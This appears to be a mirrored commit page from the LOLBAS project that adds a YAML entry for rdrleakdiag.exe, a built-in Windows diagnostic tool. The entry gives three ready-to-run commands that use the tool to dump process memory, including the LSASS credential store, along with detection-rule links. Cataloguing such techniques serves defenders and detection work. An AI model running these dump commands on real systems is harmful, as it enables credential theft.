mirror of
				https://github.com/LOLBAS-Project/LOLBAS
				synced 2025-11-04 10:39:56 +01:00 
			
		
		
		
	Merge pull request #216 from TactiKoolSec/master
Added entry for rdrleakdiag.exe process dumping lolbas
This commit is contained in:
		
							
								
								
									
										44
									
								
								yml/OSBinaries/Rdrleakdiag.yml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										44
									
								
								yml/OSBinaries/Rdrleakdiag.yml
									
									
									
									
									
										Normal file
									
								
							@@ -0,0 +1,44 @@
 | 
			
		||||
---
 | 
			
		||||
Name: rdrleakdiag.exe
 | 
			
		||||
Description: Microsoft Windows resource leak diagnostic tool
 | 
			
		||||
Author: 'John Dwyer'
 | 
			
		||||
Created: 2022-05-18
 | 
			
		||||
Commands:
 | 
			
		||||
  - Command: rdrleakdiag.exe /p 940 /o c:\evil /fullmemdmp /wait 1
 | 
			
		||||
    Description: Dump process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
 | 
			
		||||
    Usecase: Dump process by PID.
 | 
			
		||||
    Category: Dump
 | 
			
		||||
    Privileges: User
 | 
			
		||||
    MitreID: T1003
 | 
			
		||||
    OperatingSystem: Windows
 | 
			
		||||
  - Command: rdrleakdiag.exe /p 832 /o c:\evil /fullmemdmp /wait 1
 | 
			
		||||
    Description: Dump LSASS process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
 | 
			
		||||
    Usecase: Dump LSASS process.
 | 
			
		||||
    Category: Dump
 | 
			
		||||
    Privileges: Administrator
 | 
			
		||||
    MitreID: T1003.001
 | 
			
		||||
    OperatingSystem: Windows
 | 
			
		||||
  - Command: rdrleakdiag.exe /p 832 /o c:\evil /fullmemdmp /snap
 | 
			
		||||
    Description: After dumping a process using /wait 1, subsequent dumps must use /snap (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
 | 
			
		||||
    Usecase: Dump LSASS process mutliple times.
 | 
			
		||||
    Category: Dump
 | 
			
		||||
    Privileges: Administrator
 | 
			
		||||
    MitreID: T1003.001
 | 
			
		||||
    OperatingSystem: Windows
 | 
			
		||||
Full_Path:
 | 
			
		||||
  - Path: c:\windows\system32\rdrleakdiag.exe
 | 
			
		||||
  - Path: c:\Windows\SysWOW64\rdrleakdiag.exe
 | 
			
		||||
Code_Sample:
 | 
			
		||||
  - Code:
 | 
			
		||||
Detection:
 | 
			
		||||
  - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml
 | 
			
		||||
  - Elastic: https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html
 | 
			
		||||
  - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
 | 
			
		||||
Resources:
 | 
			
		||||
  - Link: https://twitter.com/0gtweet/status/1299071304805560321?s=21
 | 
			
		||||
  - Link: https://www.pureid.io/dumping-abusing-windows-credentials-part-1/
 | 
			
		||||
  - Link: https://github.com/LOLBAS-Project/LOLBAS/issues/84
 | 
			
		||||
Acknowledgement:
 | 
			
		||||
  - Person: Grzegorz Tworek
 | 
			
		||||
    Handle: '@0gtweet'
 | 
			
		||||
---
 | 
			
		||||
		Reference in New Issue
	
	Block a user